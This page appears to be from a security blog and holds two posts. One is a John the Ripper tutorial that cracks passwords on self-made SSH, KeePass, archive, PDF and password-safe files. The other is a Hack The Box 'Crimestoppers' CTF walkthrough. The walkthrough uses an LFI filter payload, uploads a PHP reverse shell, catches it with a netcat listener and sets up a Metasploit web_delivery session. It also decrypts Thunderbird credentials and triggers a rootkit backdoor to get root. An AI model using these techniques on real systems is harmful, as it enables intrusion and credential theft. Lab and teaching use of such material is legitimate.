Beginners Guide for John the Ripper (Part 2)

at 12:55 AM Saturday, June 9, 2018 0 comments

We learned most of the basic information on John the Ripper in our Previous Article which can be found here. In this article we will use John the Ripper to crack the password hashes of some of the file formats like zip, rar, pdf and much more.
To crack theses password hashes, we are going to use some of the inbuilt and some other utilities which extract the password hash form the locked file. There are some utilities that come inbuilt with john which can be found using the following command.
locate *2john
As you can see that we have the following utilities, we will demonstrate some of them here.


Cracking the SSH Password Hash
John the Ripper can crack the SSH private key which is created in RSA Encryption. To test the cracking of the private key, first we will have to create a set of new private keys. To do this we will use a utility that comes with ssh, called “ssh-keygen”.
ssh-keygen
After opening, it asks for the location at which we want the public/private rsa key pair to store? You can use any location or you can leave it as default.

After that it asks for the passphrase, after entering the password again, we successfully generate the rsa private key. (Refer the Screenshot)
When you will try to open the file, you will be greeted by the following prompt.
Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “ssh2john”.
Syntax: ssh2john [location of key]
ssh2john /home/pavan/.ssh/id_rsa > crack.txt
You can see that we converted the key to a crack able hash and then entered it into a text file named id_rsa.txt.
Now let’s use John the Ripper to crack this hash.
john –wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt
Great! We have successfully cracked the passphrase used to create the private ssh key to be “password123”
Cracking the KeepPass2 Password Hash
John the Ripper can crack the KeepPass2 key. To test the cracking of the key, first we will have to create a set of new keys. To do this we will use a utility that is called “kpcli”.
kpcli
 Now we will create a database file using command “saveas” and naming the database file as ignite.kdb and entering a passcode to secure it.
When you will try to open the file, you will be greeted by the following prompt.
Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “keepass2john”.
Syntax: keepass2john [location of key]
keepass2john ignite.kdb > crack.txt
Now let’s use John the Ripper to crack this hash.
john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Great! We have successfully cracked the passphrase used to create the key to be “12345678”
Cracking the RAR Password Hash
Now we will crack some compressed files, to do that we will have to create a file to be compressed so let’s do that using echo command as shown in the given screenshot.
You can see that we created a file.txt which we will be using to create compressed files.
echo hackingarticles.in > file.txt
John the Ripper can crack the RAR file passwords. To test the cracking of the password, first let’s create a compressed encrypted rar file.
rar a -hpabc123 file.rar file.txt
·         a = Add files to archive
·         hp[password] = Encrypt both file data and headers
 This will compress and encrypt our file.txt into a file.rar. So, when you will try to open the file, you will be greeted by the following prompt.
Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “rar2john”.
Syntax: rar2john [location of key]
rar2john file.rar > crack.txt
Now let’s use John the Ripper to crack this hash.
john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Great! We have successfully cracked the passphrase used to create the key to be “abc123”
Cracking the ZIP Password Hash
John the Ripper can crack the ZIP file passwords. To test the cracking of the password, first let’s create a compressed encrypted zip file.
zip -er file.zip file.txt
  • e = Encrypt
  •   r = Recurse into directories

This will compress and encrypt our file.txt into a file.zip. So, when you will try to open the file, you will be greeted by the following prompt.
Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “zip2john”.
Syntax: zip2john [location of key]
zip2john file.zip > crack.txt
Now let’s use John the Ripper to crack this hash.
john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Great! We have successfully cracked the passphrase used to create the key to be “654321”
Cracking the 7-Zip Password Hash
John the Ripper can crack the 7-Zip file passwords. To test the cracking of the password, first let’s create a compressed encrypted 7z file.
7z a -mhe file.7z file.txt -p”password”
                    a = Add files to archive
                    m = Set compression Method
                    h = Calculate hash values for files
                    e = Encrypt file
                    p = set Password
This will compress and encrypt our file.txt into a file.7z. So, when you will try to open the file, you will be greeted by the following prompt.
Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “7z2john”. This is not inbuilt utility, It can be downloaded from here.
Syntax: zip2john [location of key]
python 7z2john.py file.7z > crack.txt
Now let’s use John the Ripper to crack this hash.
john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Great! We have successfully cracked the passphrase used to create the key to be “password”
Cracking the PDF Password Hash
John the Ripper can crack the PDF file passwords. You can encrypt your pdf online by using this website. This will compress and encrypt our pdf into a password protected file.pdf. So, when you will try to open the file, you will be greeted by the following prompt.
Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “pdf2john”. This is not inbuilt utility, it can be downloaded from here.
Syntax: pdf2john [location of key]
 python pdf2john.py file.pdf > crack.txt
Now let’s use John the Ripper to crack this hash.
john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Great! We have successfully cracked the passphrase used to create the key to be “password123”.

Cracking the PuTTY Password Hash

John the Ripper can crack the PuTTY private key which is created in RSA Encryption. To test the cracking of the private key, first we will have to create a set of new private keys. To do this we will use a utility that comes with PuTTY, called “PuTTY Key Generator”.
Click on “Generate”. After Generating the key, we get a window where we will input the key passphrase as shown in the screenshot.
After entering the passphrase, click on Save private key to get a private key in the form of a .ppk file
After generating transfer this .ppk file to Kali Linux.
Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “putty2john”.
Syntax: putty2john [location of key]
putty2john file.ppk > crack.txt

You can see that we converted the key to a crack able hash and then entered it into a text file named crack.txt.
Now let’s use John the Ripper to crack this hash.
john –wordlist=/usr/share/wordlists/rockyou.txt id_rsa.txt
Great! We have successfully cracked the passphrase used to create the private PuTTY key to be “password”.
Cracking the “Password Safe” Password Hash
John the Ripper can crack the Password Safe Software’s key. To test the cracking of the key, first we will have to create a set of new keys. To do this we will install the Password Safe Software on our Windows 10 System.
To get a new key, Click on “New”
In this prompt, check the Show Combination Box. After that Enter the Passphrase you want to use to generate the key. This will generate a .psafe3 file.
After generating transfer this .safe3 file to Kali Linux.
Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “pwsafe2john”.
Syntax: pwsafe2john [location of key]
pwsafe2john ignite.psafe3 > crack.txt
You can see that we converted the key to a crack able hash and then entered it into a text file named crack.txt.
Now let’s use John the Ripper to crack this hash.
john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Great! We have successfully cracked the passphrase used to create the private pwsafe key to be “password123”



Labels:

Hack the Box Challenge: Crimestoppers Walkthrough

at 8:27 AM Friday, June 8, 2018 0 comments

Hello friends!! Today we are sharing our experience that can be helpful in solving new CTF challenge: Crimestoppers of Hack The Box. Solving this lab is not much easy, all you need is your penetration skill to solve this challenge.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!!
These labs are only available online, therefore, they have a static IP. Crimestoppers has IP: 10.10.10.69.
As we knew the initial stage is enumeration; therefore use nmap Aggressive scan for gathering target’s machine and running services information.




Knowing port 80 was open on victim’s network we preferred to explore his IP in the browser and the following image opened as shown below.  Here, we can see that it has two pages: home and upload but didn’t find anything suspicious.




So next, we use the dirb tool of kali to enumerate the directories and found some important directories such as http://10.10.10.80/?op=view and went on the web browser to explore them.




At upload, you can upload any comment as a Tip, in order to provide some information. So we try to upload malicious code here but get failed each time. L
If you will observe the URL http:// 10.10.10.80/?op=upload then you will realize that its look like that LFI.




But it was not easy that much to exact information by exploiting LFI with help of ../etc/password therefore by making little bit more effort and taking help from my previous article. We used curl command to find out the data from inside it with the help of PHP base64-encode.
curl http://10.10.10.80/?op=upload =php://filter/convert.base64-encode/resource=upload
As result, it returns base64 encode text which we need to decode.




To decode bsae64 encoded text follow below syntax and found a PHP script that was pointing toward some kind of token and secretname which was a link to uploads directory.
Syntax: echo BASE64TEXT | base64 -d




After struggling a lot, finally, we successfully uploaded our php backdoor with help burp suite. Follow given step to upload php web shell.
Open php-reverse-shell.php which is inbuilt in kali Linux from path: /user/share/webshells/php and modify ATTACKER’s IP and save this file on the desktop. Here we have renamed it as shell.php and compress this file.
zip -0 shell.zip shell.php




In order to capture the request web browser, enter the information for Tips and name then turn burp suite and click on Send Tip.  




Now in order to upload the content of our php backdoor through burp select the string “shell” for name = tip as shown below.




And choose php file to paste it content at the place of shell.




As you can observe that we have successfully uploaded our malicious PHP content here.




Now forward the intercepted request and you will get secretname for the uploaded file as highlighted, copy it. Then forward the request again, it will give the success.txt message and at last forward the request one more time.




Do not forget to launch netcat for reverse connection before executing your uploaded file.
nc -lvp 1234
Now open the browser and execute the following command that contains secretname of the uploaded file (PHP backdoor) and you will get netcat session for reverse connection.
http://10.10.10.80/?op=zip://uploads/10.10.14.25/e0d7a2f54d16633eb0eddfb10efed8ea5a200274%23shell
python -c 'import pty; pty.spawn("/bin/sh")'




Because we love to work with meterpreter session therefore with help of metasploit web_delivary module we generate malicious python code as shown.
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.25
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.25
msf exploit(multi/script/web_delivery) > exploit




Paste copied code in netcat which will provide meterpreter session inside Metasploit framework.




HURRAYYYY!!! We got our meterperter session, now let’s grab the user.txt file first.
Inside path: /home/dom I found user.txt file and used cat "filename" command for reading this file.
cd home
ls
cd dom
ls
cat user.txt
Great!! We got our 1st flag successfully



Now we need to find root.txt file to finish this challenge and believe me it was not easy until you won’t the hint which is hidden by the author. We try every possible method to escalated privilege to gain the root access but it was quite different from previous one.
After penetrating more and more we found a “36jinndk.default” from inside /home/dom/.thunderbird, which was encrypted file for Thunderbird profile, therefore, we download it in our local system.

meterpreter> download 36jinndk.default /root/Desktop/36


Since it was encrypted file of Thunderbird profile so with help of Google we found a python script from this Link: https://github.com/unode/firefox_decrypt for its decryption.
With help of the following command, we successfully found password: Gummer59
python firefox_decrypt.py /root/Desktop/36



We applied this password to escalated user:dom with help of the following command and then move into crimestoppers.htb directory it looks like his mailbox directory where we found so many files such INBOX.
su dome
Password:
cd /home/dom/.thunderbird/36jinndk.default/ImapMail/crimestoppers.htb




First we look into INBOX for any hint for root.txt but didn't find something related to root.txt flag similarly we open other files but didn’t found anything.




At last, we open Drafts-1 and read the following line which looks like a hint of root access.
I don't trust them and run rkhunter, it reported that there a rootkit installed called:apache_modrootme backdoor” and its execution method.




So we explore following the path we found the access.log.2.gz file since it was a compressed file, therefore, it was better to copy it inside /tmp for further steps.
cd /var/log/apache2
cp access.log.2.gz/tmp

Now let’s move inside /tmp to extract the copied file inside it with the help of gunzip.
gunzip access.log.2.gz
ls
cat access.log.2.gz
You can observe the log for a command “FunSociety” which has been executed several times.




As per the message read from DRAFT-1 we run netcat on localhost on port 80 get root access with help of following commands when executed.
nc localhost 80
get FunSociety
get FunSociety
id
Now let’s get the root.txt and finish this task.
cd /root
cat root.txt
BOOOOOM!!!! We hit the Goal and completed both task.J


Labels:
Subscribe to: Posts (Atom)